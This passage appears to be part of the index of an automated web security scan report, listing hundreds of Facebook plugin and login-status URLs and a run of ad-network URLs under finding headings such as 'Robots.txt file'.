19.434. http://www.facebook.com/common/scribe_endpoint.php

19.435. http://www.facebook.com/common/scribe_endpoint.php

19.436. http://www.facebook.com/common/scribe_endpoint.php

19.437. http://www.facebook.com/common/scribe_endpoint.php

19.438. http://www.facebook.com/common/scribe_endpoint.php

19.439. http://www.facebook.com/common/scribe_endpoint.php

19.440. http://www.facebook.com/common/scribe_endpoint.php

19.441. http://www.facebook.com/common/scribe_endpoint.php

19.442. http://www.facebook.com/common/scribe_endpoint.php

19.443. http://www.facebook.com/common/scribe_endpoint.php

19.444. http://www.facebook.com/common/scribe_endpoint.php

19.445. http://www.facebook.com/common/scribe_endpoint.php

19.446. http://www.facebook.com/common/scribe_endpoint.php

19.447. http://www.facebook.com/common/scribe_endpoint.php

19.448. http://www.facebook.com/common/scribe_endpoint.php

19.449. http://www.facebook.com/common/scribe_endpoint.php

19.450. http://www.facebook.com/common/scribe_endpoint.php

19.451. http://www.facebook.com/common/scribe_endpoint.php

19.452. http://www.facebook.com/common/scribe_endpoint.php

19.453. http://www.facebook.com/common/scribe_endpoint.php

19.454. http://www.facebook.com/common/scribe_endpoint.php

19.455. http://www.facebook.com/common/scribe_endpoint.php

19.456. http://www.facebook.com/common/scribe_endpoint.php

19.457. http://www.facebook.com/common/scribe_endpoint.php

19.458. http://www.facebook.com/common/scribe_endpoint.php

19.459. http://www.facebook.com/common/scribe_endpoint.php

19.460. http://www.facebook.com/common/scribe_endpoint.php

19.461. http://www.facebook.com/common/scribe_endpoint.php

19.462. http://www.facebook.com/common/scribe_endpoint.php

19.463. http://www.facebook.com/common/scribe_endpoint.php

19.464. http://www.facebook.com/common/scribe_endpoint.php

19.465. http://www.facebook.com/common/scribe_endpoint.php

19.466. http://www.facebook.com/common/scribe_endpoint.php

19.467. http://www.facebook.com/common/scribe_endpoint.php

19.468. http://www.facebook.com/common/scribe_endpoint.php

19.469. http://www.facebook.com/common/scribe_endpoint.php

19.470. http://www.facebook.com/common/scribe_endpoint.php

19.471. http://www.facebook.com/common/scribe_endpoint.php

19.472. http://www.facebook.com/common/scribe_endpoint.php

19.473. http://www.facebook.com/common/scribe_endpoint.php

19.474. http://www.facebook.com/common/scribe_endpoint.php

19.475. http://www.facebook.com/common/scribe_endpoint.php

19.476. http://www.facebook.com/common/scribe_endpoint.php

19.477. http://www.facebook.com/common/scribe_endpoint.php

19.478. http://www.facebook.com/common/scribe_endpoint.php

19.479. http://www.facebook.com/common/scribe_endpoint.php

19.480. http://www.facebook.com/common/scribe_endpoint.php

19.481. http://www.facebook.com/common/scribe_endpoint.php

19.482. http://www.facebook.com/common/scribe_endpoint.php

19.483. http://www.facebook.com/common/scribe_endpoint.php

19.484. http://www.facebook.com/common/scribe_endpoint.php

19.485. http://www.facebook.com/common/scribe_endpoint.php

19.486. http://www.facebook.com/common/scribe_endpoint.php

19.487. http://www.facebook.com/common/scribe_endpoint.php

19.488. http://www.facebook.com/common/scribe_endpoint.php

19.489. http://www.facebook.com/common/scribe_endpoint.php

19.490. http://www.facebook.com/common/scribe_endpoint.php

19.491. http://www.facebook.com/common/scribe_endpoint.php

19.492. http://www.facebook.com/common/scribe_endpoint.php

19.493. http://www.facebook.com/common/scribe_endpoint.php

19.494. http://www.facebook.com/common/scribe_endpoint.php

19.495. http://www.facebook.com/common/scribe_endpoint.php

19.496. http://www.facebook.com/common/scribe_endpoint.php

19.497. http://www.facebook.com/common/scribe_endpoint.php

19.498. http://www.facebook.com/common/scribe_endpoint.php

19.499. http://www.facebook.com/common/scribe_endpoint.php

19.500. http://www.facebook.com/common/scribe_endpoint.php

19.501. http://www.facebook.com/common/scribe_endpoint.php

19.502. http://www.facebook.com/common/scribe_endpoint.php

19.503. http://www.facebook.com/common/scribe_endpoint.php

19.504. http://www.facebook.com/common/scribe_endpoint.php

19.505. http://www.facebook.com/common/scribe_endpoint.php

19.506. http://www.facebook.com/common/scribe_endpoint.php

19.507. http://www.facebook.com/common/scribe_endpoint.php

19.508. http://www.facebook.com/common/scribe_endpoint.php

19.509. http://www.facebook.com/common/scribe_endpoint.php

19.510. http://www.facebook.com/common/scribe_endpoint.php

19.511. http://www.facebook.com/common/scribe_endpoint.php

19.512. http://www.facebook.com/common/scribe_endpoint.php

19.513. http://www.facebook.com/common/scribe_endpoint.php

19.514. http://www.facebook.com/common/scribe_endpoint.php

19.515. http://www.facebook.com/common/scribe_endpoint.php

19.516. http://www.facebook.com/common/scribe_endpoint.php

19.517. http://www.facebook.com/common/scribe_endpoint.php

19.518. http://www.facebook.com/common/scribe_endpoint.php

19.519. http://www.facebook.com/common/scribe_endpoint.php

19.520. http://www.facebook.com/common/scribe_endpoint.php

19.521. http://www.facebook.com/common/scribe_endpoint.php

19.522. http://www.facebook.com/common/scribe_endpoint.php

19.523. http://www.facebook.com/common/scribe_endpoint.php

19.524. http://www.facebook.com/common/scribe_endpoint.php

19.525. http://www.facebook.com/common/scribe_endpoint.php

19.526. http://www.facebook.com/common/scribe_endpoint.php

19.527. http://www.facebook.com/common/scribe_endpoint.php

19.528. http://www.facebook.com/common/scribe_endpoint.php

19.529. http://www.facebook.com/common/scribe_endpoint.php

19.530. http://www.facebook.com/common/scribe_endpoint.php

19.531. http://www.facebook.com/common/scribe_endpoint.php

19.532. http://www.facebook.com/common/scribe_endpoint.php

19.533. http://www.facebook.com/common/scribe_endpoint.php

19.534. http://www.facebook.com/common/scribe_endpoint.php

19.535. http://www.facebook.com/common/scribe_endpoint.php

19.536. http://www.facebook.com/common/scribe_endpoint.php

19.537. http://www.facebook.com/common/scribe_endpoint.php

19.538. http://www.facebook.com/common/scribe_endpoint.php

19.539. http://www.facebook.com/common/scribe_endpoint.php

19.540. http://www.facebook.com/common/scribe_endpoint.php

19.541. http://www.facebook.com/common/scribe_endpoint.php

19.542. http://www.facebook.com/common/scribe_endpoint.php

19.543. http://www.facebook.com/common/scribe_endpoint.php

19.544. http://www.facebook.com/common/scribe_endpoint.php

19.545. http://www.facebook.com/common/scribe_endpoint.php

19.546. http://www.facebook.com/common/scribe_endpoint.php

19.547. http://www.facebook.com/common/scribe_endpoint.php

19.548. http://www.facebook.com/common/scribe_endpoint.php

19.549. http://www.facebook.com/common/scribe_endpoint.php

19.550. http://www.facebook.com/common/scribe_endpoint.php

19.551. http://www.facebook.com/common/scribe_endpoint.php

19.552. http://www.facebook.com/common/scribe_endpoint.php

19.553. http://www.facebook.com/common/scribe_endpoint.php

19.554. http://www.facebook.com/common/scribe_endpoint.php

19.555. http://www.facebook.com/common/scribe_endpoint.php

19.556. http://www.facebook.com/common/scribe_endpoint.php

19.557. http://www.facebook.com/common/scribe_endpoint.php

19.558. http://www.facebook.com/common/scribe_endpoint.php

19.559. http://www.facebook.com/common/scribe_endpoint.php

19.560. http://www.facebook.com/common/scribe_endpoint.php

19.561. http://www.facebook.com/common/scribe_endpoint.php

19.562. http://www.facebook.com/common/scribe_endpoint.php

19.563. http://www.facebook.com/common/scribe_endpoint.php

19.564. http://www.facebook.com/common/scribe_endpoint.php

19.565. http://www.facebook.com/common/scribe_endpoint.php

19.566. http://www.facebook.com/common/scribe_endpoint.php

19.567. http://www.facebook.com/common/scribe_endpoint.php

19.568. http://www.facebook.com/common/scribe_endpoint.php

19.569. http://www.facebook.com/common/scribe_endpoint.php

19.570. http://www.facebook.com/common/scribe_endpoint.php

19.571. http://www.facebook.com/common/scribe_endpoint.php

19.572. http://www.facebook.com/common/scribe_endpoint.php

19.573. http://www.facebook.com/common/scribe_endpoint.php

19.574. http://www.facebook.com/common/scribe_endpoint.php

19.575. http://www.facebook.com/common/scribe_endpoint.php

19.576. http://www.facebook.com/common/scribe_endpoint.php

19.577. http://www.facebook.com/common/scribe_endpoint.php

19.578. http://www.facebook.com/common/scribe_endpoint.php

19.579. http://www.facebook.com/common/scribe_endpoint.php

19.580. http://www.facebook.com/common/scribe_endpoint.php

19.581. http://www.facebook.com/common/scribe_endpoint.php

19.582. http://www.facebook.com/common/scribe_endpoint.php

19.583. http://www.facebook.com/common/scribe_endpoint.php

19.584. http://www.facebook.com/common/scribe_endpoint.php

19.585. http://www.facebook.com/common/scribe_endpoint.php

19.586. http://www.facebook.com/common/scribe_endpoint.php

19.587. http://www.facebook.com/common/scribe_endpoint.php

19.588. http://www.facebook.com/common/scribe_endpoint.php

19.589. http://www.facebook.com/common/scribe_endpoint.php

19.590. http://www.facebook.com/common/scribe_endpoint.php

19.591. http://www.facebook.com/common/scribe_endpoint.php

19.592. http://www.facebook.com/common/scribe_endpoint.php

19.593. http://www.facebook.com/common/scribe_endpoint.php

19.594. http://www.facebook.com/common/scribe_endpoint.php

19.595. http://www.facebook.com/common/scribe_endpoint.php

19.596. http://www.facebook.com/common/scribe_endpoint.php

19.597. http://www.facebook.com/common/scribe_endpoint.php

19.598. http://www.facebook.com/common/scribe_endpoint.php

19.599. http://www.facebook.com/common/scribe_endpoint.php

19.600. http://www.facebook.com/common/scribe_endpoint.php

19.601. http://www.facebook.com/common/scribe_endpoint.php

19.602. http://www.facebook.com/common/scribe_endpoint.php

19.603. http://www.facebook.com/common/scribe_endpoint.php

19.604. http://www.facebook.com/common/scribe_endpoint.php

19.605. http://www.facebook.com/common/scribe_endpoint.php

19.606. http://www.facebook.com/common/scribe_endpoint.php

19.607. http://www.facebook.com/common/scribe_endpoint.php

19.608. http://www.facebook.com/common/scribe_endpoint.php

19.609. http://www.facebook.com/common/scribe_endpoint.php

19.610. http://www.facebook.com/common/scribe_endpoint.php

19.611. http://www.facebook.com/common/scribe_endpoint.php

19.612. http://www.facebook.com/common/scribe_endpoint.php

19.613. http://www.facebook.com/common/scribe_endpoint.php

19.614. http://www.facebook.com/common/scribe_endpoint.php

19.615. http://www.facebook.com/common/scribe_endpoint.php

19.616. http://www.facebook.com/common/scribe_endpoint.php

19.617. http://www.facebook.com/common/scribe_endpoint.php

19.618. http://www.facebook.com/common/scribe_endpoint.php

19.619. http://www.facebook.com/common/scribe_endpoint.php

19.620. http://www.facebook.com/common/scribe_endpoint.php

19.621. http://www.facebook.com/common/scribe_endpoint.php

19.622. http://www.facebook.com/common/scribe_endpoint.php

19.623. http://www.facebook.com/common/scribe_endpoint.php

19.624. http://www.facebook.com/common/scribe_endpoint.php

19.625. http://www.facebook.com/common/scribe_endpoint.php

19.626. http://www.facebook.com/extern/login_status.php

19.627. http://www.facebook.com/extern/login_status.php

19.628. http://www.facebook.com/extern/login_status.php

19.629. http://www.facebook.com/extern/login_status.php

19.630. http://www.facebook.com/extern/login_status.php

19.631. http://www.facebook.com/extern/login_status.php

19.632. http://www.facebook.com/extern/login_status.php

19.633. http://www.facebook.com/extern/login_status.php

19.634. http://www.facebook.com/extern/login_status.php

19.635. http://www.facebook.com/extern/login_status.php

19.636. http://www.facebook.com/extern/login_status.php

19.637. http://www.facebook.com/extern/login_status.php

19.638. http://www.facebook.com/extern/login_status.php

19.639. http://www.facebook.com/extern/login_status.php

19.640. http://www.facebook.com/extern/login_status.php

19.641. http://www.facebook.com/extern/login_status.php

19.642. http://www.facebook.com/extern/login_status.php

19.643. http://www.facebook.com/extern/login_status.php

19.644. http://www.facebook.com/extern/login_status.php

19.645. http://www.facebook.com/extern/login_status.php

19.646. http://www.facebook.com/extern/login_status.php

19.647. http://www.facebook.com/extern/login_status.php

19.648. http://www.facebook.com/extern/login_status.php

19.649. http://www.facebook.com/extern/login_status.php

19.650. http://www.facebook.com/extern/login_status.php

19.651. http://www.facebook.com/extern/login_status.php

19.652. http://www.facebook.com/extern/login_status.php

19.653. http://www.facebook.com/extern/login_status.php

19.654. http://www.facebook.com/extern/login_status.php

19.655. http://www.facebook.com/extern/login_status.php

19.656. http://www.facebook.com/extern/login_status.php

19.657. http://www.facebook.com/extern/login_status.php

19.658. http://www.facebook.com/extern/login_status.php

19.659. http://www.facebook.com/extern/login_status.php

19.660. http://www.facebook.com/extern/login_status.php

19.661. http://www.facebook.com/extern/login_status.php

19.662. http://www.facebook.com/extern/login_status.php

19.663. http://www.facebook.com/extern/login_status.php

19.664. http://www.facebook.com/extern/login_status.php

19.665. http://www.facebook.com/extern/login_status.php

19.666. http://www.facebook.com/extern/login_status.php

19.667. http://www.facebook.com/extern/login_status.php

19.668. http://www.facebook.com/extern/login_status.php

19.669. http://www.facebook.com/extern/login_status.php

19.670. http://www.facebook.com/extern/login_status.php

19.671. http://www.facebook.com/extern/login_status.php

19.672. http://www.facebook.com/extern/login_status.php

19.673. http://www.facebook.com/extern/login_status.php

19.674. http://www.facebook.com/extern/login_status.php

19.675. http://www.facebook.com/extern/login_status.php

19.676. http://www.facebook.com/extern/login_status.php

19.677. http://www.facebook.com/extern/login_status.php

19.678. http://www.facebook.com/extern/login_status.php

19.679. http://www.facebook.com/extern/login_status.php

19.680. http://www.facebook.com/extern/login_status.php

19.681. http://www.facebook.com/extern/login_status.php

19.682. http://www.facebook.com/extern/login_status.php

19.683. http://www.facebook.com/extern/login_status.php

19.684. http://www.facebook.com/extern/login_status.php

19.685. http://www.facebook.com/extern/login_status.php

19.686. http://www.facebook.com/extern/login_status.php

19.687. http://www.facebook.com/extern/login_status.php

19.688. http://www.facebook.com/extern/login_status.php

19.689. http://www.facebook.com/extern/login_status.php

19.690. http://www.facebook.com/extern/login_status.php

19.691. http://www.facebook.com/extern/login_status.php

19.692. http://www.facebook.com/extern/login_status.php

19.693. http://www.facebook.com/extern/login_status.php

19.694. http://www.facebook.com/extern/login_status.php

19.695. http://www.facebook.com/extern/login_status.php

19.696. http://www.facebook.com/extern/login_status.php

19.697. http://www.facebook.com/extern/login_status.php

19.698. http://www.facebook.com/extern/login_status.php

19.699. http://www.facebook.com/extern/login_status.php

19.700. http://www.facebook.com/extern/login_status.php

19.701. http://www.facebook.com/extern/login_status.php

19.702. http://www.facebook.com/extern/login_status.php

19.703. http://www.facebook.com/extern/login_status.php

19.704. http://www.facebook.com/extern/login_status.php

19.705. http://www.facebook.com/extern/login_status.php

19.706. http://www.facebook.com/extern/login_status.php

19.707. http://www.facebook.com/extern/login_status.php

19.708. http://www.facebook.com/extern/login_status.php

19.709. http://www.facebook.com/extern/login_status.php

19.710. http://www.facebook.com/extern/login_status.php

19.711. http://www.facebook.com/extern/login_status.php

19.712. http://www.facebook.com/extern/login_status.php

19.713. http://www.facebook.com/extern/login_status.php

19.714. http://www.facebook.com/extern/login_status.php

19.715. http://www.facebook.com/plugins/like.php

19.716. http://www.facebook.com/plugins/like.php

19.717. http://www.facebook.com/plugins/like.php

19.718. http://www.facebook.com/plugins/like.php

19.719. http://www.facebook.com/plugins/like.php

19.720. http://www.facebook.com/plugins/like.php

19.721. http://www.facebook.com/plugins/like.php

19.722. http://www.facebook.com/plugins/like.php

19.723. http://www.facebook.com/plugins/like.php

19.724. http://www.facebook.com/plugins/like.php

19.725. http://www.facebook.com/plugins/like.php

19.726. http://www.facebook.com/plugins/like.php

19.727. http://www.facebook.com/plugins/like.php

19.728. http://www.facebook.com/plugins/like.php

19.729. http://www.facebook.com/plugins/like.php

19.730. http://www.facebook.com/plugins/like.php

19.731. http://www.facebook.com/plugins/like.php

19.732. http://www.facebook.com/plugins/like.php

19.733. http://www.facebook.com/plugins/like.php

19.734. http://www.facebook.com/plugins/like.php

19.735. http://www.facebook.com/plugins/like.php

19.736. http://www.facebook.com/plugins/like.php

19.737. http://www.facebook.com/plugins/like.php

19.738. http://www.facebook.com/plugins/like.php

19.739. http://www.facebook.com/plugins/like.php

19.740. http://www.facebook.com/plugins/like.php

19.741. http://www.facebook.com/plugins/like.php

19.742. http://www.facebook.com/plugins/like.php

19.743. http://www.facebook.com/plugins/like.php

19.744. http://www.facebook.com/plugins/like.php

19.745. http://www.facebook.com/plugins/like.php

19.746. http://www.facebook.com/plugins/like.php

19.747. http://www.facebook.com/plugins/like.php

19.748. http://www.facebook.com/plugins/like.php

19.749. http://www.facebook.com/plugins/like.php

19.750. http://www.facebook.com/plugins/like.php

19.751. http://www.facebook.com/plugins/like.php

19.752. http://www.facebook.com/plugins/like.php

19.753. http://www.facebook.com/plugins/like.php

19.754. http://www.facebook.com/plugins/like.php

19.755. http://www.facebook.com/plugins/like.php

19.756. http://www.facebook.com/plugins/like.php

19.757. http://www.facebook.com/plugins/like.php

19.758. http://www.facebook.com/plugins/like.php

19.759. http://www.facebook.com/plugins/like.php

19.760. http://www.facebook.com/plugins/like.php

19.761. http://www.facebook.com/plugins/like.php

19.762. http://www.facebook.com/plugins/like.php

19.763. http://www.facebook.com/plugins/like.php

19.764. http://www.facebook.com/plugins/like.php

19.765. http://www.facebook.com/plugins/like.php

19.766. http://www.facebook.com/plugins/like.php

19.767. http://www.facebook.com/plugins/like.php

19.768. http://www.facebook.com/plugins/like.php

19.769. http://www.facebook.com/plugins/like.php

19.770. http://www.facebook.com/plugins/like.php

19.771. http://www.facebook.com/plugins/like.php

19.772. http://www.facebook.com/plugins/like.php

19.773. http://www.facebook.com/plugins/like.php

19.774. http://www.facebook.com/plugins/like.php

19.775. http://www.facebook.com/plugins/like.php

19.776. http://www.facebook.com/plugins/like.php

19.777. http://www.facebook.com/plugins/like.php

19.778. http://www.facebook.com/plugins/like.php

19.779. http://www.facebook.com/plugins/like.php

19.780. http://www.facebook.com/plugins/like.php

19.781. http://www.facebook.com/plugins/like.php

19.782. http://www.facebook.com/plugins/like.php

19.783. http://www.facebook.com/plugins/like.php

19.784. http://www.facebook.com/plugins/like.php

19.785. http://www.facebook.com/plugins/like.php

19.786. http://www.facebook.com/plugins/like.php

19.787. http://www.facebook.com/plugins/like.php

19.788. http://www.facebook.com/plugins/like.php

19.789. http://www.facebook.com/plugins/like.php

19.790. http://www.facebook.com/plugins/like.php

19.791. http://www.facebook.com/plugins/like.php

19.792. http://www.facebook.com/plugins/like.php

19.793. http://www.facebook.com/plugins/like.php

19.794. http://www.facebook.com/plugins/like.php

19.795. http://www.facebook.com/plugins/like.php

19.796. http://www.facebook.com/plugins/like.php

19.797. http://www.facebook.com/plugins/like.php

19.798. http://www.facebook.com/plugins/like.php

19.799. http://www.facebook.com/plugins/like.php

19.800. http://www.facebook.com/plugins/like.php

19.801. http://www.facebook.com/plugins/like.php

19.802. http://www.facebook.com/plugins/like.php

19.803. http://www.facebook.com/plugins/like.php

19.804. http://www.facebook.com/plugins/like.php

19.805. http://www.facebook.com/plugins/like.php

19.806. http://www.facebook.com/plugins/like.php

19.807. http://www.facebook.com/plugins/like.php

19.808. http://www.facebook.com/plugins/like.php

19.809. http://www.facebook.com/plugins/like.php

19.810. http://www.facebook.com/plugins/like.php

19.811. http://www.facebook.com/plugins/like.php

19.812. http://www.facebook.com/plugins/like.php

19.813. http://www.facebook.com/plugins/like.php

19.814. http://www.facebook.com/plugins/like.php

19.815. http://www.facebook.com/plugins/like.php

19.816. http://www.facebook.com/plugins/like.php

19.817. http://www.facebook.com/plugins/like.php

19.818. http://www.facebook.com/plugins/like.php

19.819. http://www.facebook.com/plugins/like.php

19.820. http://www.facebook.com/plugins/like.php

19.821. http://www.facebook.com/plugins/like.php

19.822. http://www.facebook.com/plugins/like.php

19.823. http://www.facebook.com/plugins/like.php

19.824. http://www.facebook.com/plugins/like.php

19.825. http://www.facebook.com/plugins/like.php

19.826. http://www.facebook.com/plugins/like.php

19.827. http://www.facebook.com/plugins/like.php

19.828. http://www.facebook.com/plugins/like.php

19.829. http://www.facebook.com/plugins/like.php

19.830. http://www.facebook.com/plugins/like.php

19.831. http://www.facebook.com/plugins/like.php

19.832. http://www.facebook.com/plugins/like.php

19.833. http://www.facebook.com/plugins/like.php

19.834. http://www.facebook.com/plugins/like.php

19.835. http://www.facebook.com/plugins/like.php

19.836. http://www.facebook.com/plugins/like.php

19.837. http://www.facebook.com/plugins/like.php

19.838. http://www.facebook.com/plugins/like.php

19.839. http://www.facebook.com/plugins/like.php

19.840. http://www.facebook.com/plugins/like.php

19.841. http://www.facebook.com/plugins/like.php

19.842. http://www.facebook.com/plugins/like.php

19.843. http://www.facebook.com/plugins/like.php

19.844. http://www.facebook.com/plugins/like.php

19.845. http://www.facebook.com/plugins/like.php

19.846. http://www.facebook.com/plugins/like.php

19.847. http://www.facebook.com/plugins/like.php

19.848. http://www.facebook.com/plugins/like.php

19.849. http://www.facebook.com/plugins/like.php

19.850. http://www.facebook.com/plugins/like.php

19.851. http://www.facebook.com/plugins/like.php

19.852. http://www.facebook.com/plugins/like.php

19.853. http://www.facebook.com/plugins/like.php

19.854. http://www.facebook.com/plugins/like.php

19.855. http://www.facebook.com/plugins/like.php

19.856. http://www.facebook.com/plugins/like.php

19.857. http://www.facebook.com/plugins/like.php

19.858. http://www.facebook.com/plugins/like.php

19.859. http://www.facebook.com/plugins/like.php

19.860. http://www.facebook.com/plugins/like.php

19.861. http://www.facebook.com/plugins/like.php

19.862. http://www.facebook.com/plugins/like.php

19.863. http://www.facebook.com/plugins/like.php

19.864. http://www.facebook.com/plugins/like.php

19.865. http://www.facebook.com/plugins/like.php

19.866. http://www.facebook.com/plugins/like.php

19.867. http://www.facebook.com/plugins/like.php

19.868. http://www.facebook.com/plugins/like.php

19.869. http://www.facebook.com/plugins/like.php

19.870. http://www.facebook.com/plugins/like.php

19.871. http://www.facebook.com/plugins/like.php

19.872. http://www.facebook.com/plugins/like.php

19.873. http://www.facebook.com/plugins/like.php

19.874. http://www.facebook.com/plugins/like.php

19.875. http://www.facebook.com/plugins/like.php

19.876. http://www.facebook.com/plugins/like.php

19.877. http://www.facebook.com/plugins/like.php

19.878. http://www.facebook.com/plugins/like.php

19.879. http://www.facebook.com/plugins/like.php

19.880. http://www.facebook.com/plugins/like.php

19.881. http://www.facebook.com/plugins/like.php

19.882. http://www.facebook.com/plugins/like.php

19.883. http://www.facebook.com/plugins/like.php

19.884. http://www.facebook.com/plugins/like.php

19.885. http://www.facebook.com/plugins/like.php

19.886. http://www.facebook.com/plugins/like.php

19.887. http://www.facebook.com/plugins/like.php

19.888. http://www.facebook.com/plugins/like.php

19.889. http://www.facebook.com/plugins/like.php

19.890. http://www.facebook.com/plugins/like.php

19.891. http://www.facebook.com/plugins/like.php

19.892. http://www.facebook.com/plugins/like.php

19.893. http://www.facebook.com/plugins/like.php

19.894. http://www.facebook.com/plugins/like.php

19.895. http://www.facebook.com/plugins/like.php

19.896. http://www.facebook.com/plugins/like.php

19.897. http://www.facebook.com/plugins/like.php

19.898. http://www.facebook.com/plugins/like.php

19.899. http://www.facebook.com/plugins/like.php

19.900. http://www.facebook.com/plugins/like.php

19.901. http://www.facebook.com/plugins/like.php

19.902. http://www.facebook.com/plugins/like.php

19.903. http://www.facebook.com/plugins/recommendations.php

19.904. http://www.facebook.com/plugins/recommendations.php

19.905. http://www.facebook.com/plugins/recommendations.php

19.906. http://www.facebook.com/plugins/recommendations.php

19.907. http://www.facebook.com/plugins/recommendations.php

19.908. http://www.facebook.com/plugins/recommendations.php

19.909. http://www.facebook.com/plugins/recommendations.php

19.910. http://www.facebook.com/plugins/recommendations.php

19.911. http://www.facebook.com/plugins/recommendations.php

19.912. http://www.facebook.com/plugins/recommendations.php

19.913. http://www.facebook.com/plugins/recommendations.php

19.914. http://www.facebook.com/plugins/recommendations.php

19.915. http://www.facebook.com/plugins/recommendations.php

19.916. http://www.facebook.com/plugins/recommendations.php

19.917. http://www.facebook.com/plugins/recommendations.php

19.918. http://www.facebook.com/plugins/recommendations.php

19.919. http://www.facebook.com/plugins/recommendations.php

19.920. http://www.facebook.com/plugins/recommendations.php

19.921. http://www.facebook.com/plugins/recommendations.php

19.922. http://www.facebook.com/plugins/recommendations.php

19.923. http://www.facebook.com/plugins/recommendations.php

19.924. http://www.facebook.com/plugins/recommendations.php

19.925. http://www.facebook.com/plugins/recommendations.php

19.926. http://www.facebook.com/plugins/recommendations.php

19.927. http://www.facebook.com/plugins/recommendations.php

19.928. http://www.facebook.com/plugins/recommendations.php

19.929. http://www.facebook.com/plugins/recommendations.php

19.930. http://www.facebook.com/plugins/recommendations.php

19.931. http://www.facebook.com/plugins/recommendations.php

19.932. http://www.facebook.com/plugins/recommendations.php

19.933. http://www.facebook.com/plugins/recommendations.php

19.934. http://www.facebook.com/plugins/recommendations.php

19.935. http://www.facebook.com/plugins/recommendations.php

19.936. http://www.facebook.com/plugins/recommendations.php

19.937. http://www.facebook.com/plugins/recommendations.php

19.938. http://www.facebook.com/plugins/recommendations.php

19.939. http://www.facebook.com/plugins/recommendations.php

19.940. http://www.facebook.com/plugins/recommendations.php

19.941. http://www.facebook.com/plugins/recommendations.php

19.942. http://www.facebook.com/plugins/recommendations.php

19.943. http://www.facebook.com/plugins/recommendations.php

19.944. http://www.facebook.com/plugins/recommendations.php

19.945. http://www.facebook.com/plugins/recommendations.php

19.946. http://www.facebook.com/plugins/recommendations.php

19.947. http://www.facebook.com/plugins/recommendations.php

19.948. http://www.facebook.com/plugins/recommendations.php

19.949. http://www.facebook.com/plugins/recommendations.php

19.950. http://www.facebook.com/plugins/recommendations.php

19.951. http://www.facebook.com/plugins/recommendations.php

19.952. http://www.facebook.com/plugins/recommendations.php

19.953. http://www.facebook.com/plugins/recommendations.php

19.954. http://www.facebook.com/plugins/recommendations.php

19.955. http://www.facebook.com/plugins/recommendations.php

19.956. http://www.facebook.com/plugins/recommendations.php

19.957. http://www.facebook.com/plugins/recommendations.php

19.958. http://www.facebook.com/plugins/recommendations.php

19.959. http://www.facebook.com/plugins/recommendations.php

19.960. http://www.facebook.com/plugins/recommendations.php

19.961. http://www.facebook.com/plugins/recommendations.php

19.962. http://www.facebook.com/plugins/recommendations.php

19.963. http://www.facebook.com/plugins/recommendations.php

19.964. http://www.facebook.com/plugins/recommendations.php

19.965. http://www.facebook.com/plugins/recommendations.php

19.966. http://www.facebook.com/plugins/recommendations.php

19.967. http://www.facebook.com/plugins/recommendations.php

19.968. http://www.facebook.com/plugins/recommendations.php

19.969. http://www.facebook.com/plugins/recommendations.php

19.970. http://www.facebook.com/plugins/recommendations.php

19.971. http://www.facebook.com/plugins/recommendations.php

19.972. http://www.facebook.com/plugins/recommendations.php

19.973. http://www.facebook.com/plugins/recommendations.php

19.974. http://www.facebook.com/plugins/recommendations.php

19.975. http://www.facebook.com/plugins/recommendations.php

19.976. http://www.facebook.com/plugins/recommendations.php

19.977. http://www.facebook.com/plugins/recommendations.php

19.978. http://www.facebook.com/plugins/recommendations.php

19.979. http://www.facebook.com/plugins/recommendations.php

19.980. http://www.facebook.com/plugins/recommendations.php

19.981. http://www.facebook.com/plugins/recommendations.php

19.982. http://www.facebook.com/plugins/recommendations.php

19.983. http://www.facebook.com/plugins/recommendations.php

19.984. http://www.facebook.com/plugins/recommendations.php

19.985. http://www.facebook.com/plugins/recommendations.php

19.986. http://www.facebook.com/plugins/recommendations.php

19.987. http://www.facebook.com/plugins/recommendations.php

19.988. http://www.facebook.com/plugins/recommendations.php

19.989. http://www.facebook.com/plugins/recommendations.php

19.990. http://www.facebook.com/widgets/recommendations.php

19.991. http://www.facebook.com/widgets/recommendations.php

20. Credit card numbers disclosed

21. Robots.txt file

21.1. http://a.rfihub.com/sed

21.2. http://a.tribalfusion.com/j.ad

21.3. http://a1.sndcdn.com/stylesheets/special.css

21.4. http://ad.burstdirectads.com/unpixel

21.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

21.6. http://ad.yieldmanager.com/pixel

21.7. http://ads.bluelithium.com/st

21.8. http://ads.pointroll.com/PortalServe/

21.9. http://ads.undertone.com/ajs.php

21.10. http://adserver.adtechus.com/bind

21.11. http://adsfac.us/ag.asp

21.12. http://adx.g.doubleclick.net/pagead/adview

21.13. http://altfarm.mediaplex.com/ad/js/17038-128465-5934-2

21.14. http://am.nexac.com/match

21.15. http://amch.questionmarket.com/adscgen/st.php

21.16. http://api.bizographics.com/v1/profile.json

21.17. http://b.scorecardresearch.com/b

21.18. http://b.voicefive.com/b2

21.19. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

21.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

21.21. http://c.betrad.com/a/n/273/1153.js

21.22. http://c7.zedo.com/img/bh.gif

21.23. http://cache.specificmedia.com/creative/blank.gif

21.24. http://cas.criteo.com/delivery/afr.php

21.25. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162

21.26. http://cdn.krxd.net/config/

21.27. http://cdn.turn.com/server/ddc.htm

21.28. http://cdn5.tribalfusion.com/media/1956006/frame.html

21.29. http://check4.facebook.com/ajax/v6.php

21.30. http://check6.facebook.com/ajax/v6.php

21.31. http://cheetah.vizu.com/i.gif

21.32. http://citi.bridgetrack.com/usc/_spredir.htm

21.33. http://click.linksynergy.com/fs-bin/click

21.34. http://clickserve.cc-dt.com/link/click

21.35. http://cm.g.doubleclick.net/pixel

21.36. http://commerce.wsj.com/auth/forgotpass

21.37. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

21.38. http://d7.zedo.com/img/bh.gif

21.39. http://dar.youknowbest.com/

21.40. http://dis.ny.us.criteo.com/dis/dis.aspx

21.41. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

21.42. http://ev.ib-ibi.com/image.sbix

21.43. http://feeds.bbci.co.uk/news/rss.xml

21.44. http://fls.doubleclick.net/activityi

21.45. http://gan.doubleclick.net/gan_impression

21.46. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1049525132/

21.47. http://homedepot.ugc.bazaarvoice.com/static/1999q/r_5_ispacer.gif

21.48. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js

21.49. http://imp.constantcontact.com/imp/cmp.jsp

21.50. http://l.addthiscdn.com/live/t00/250lo.gif

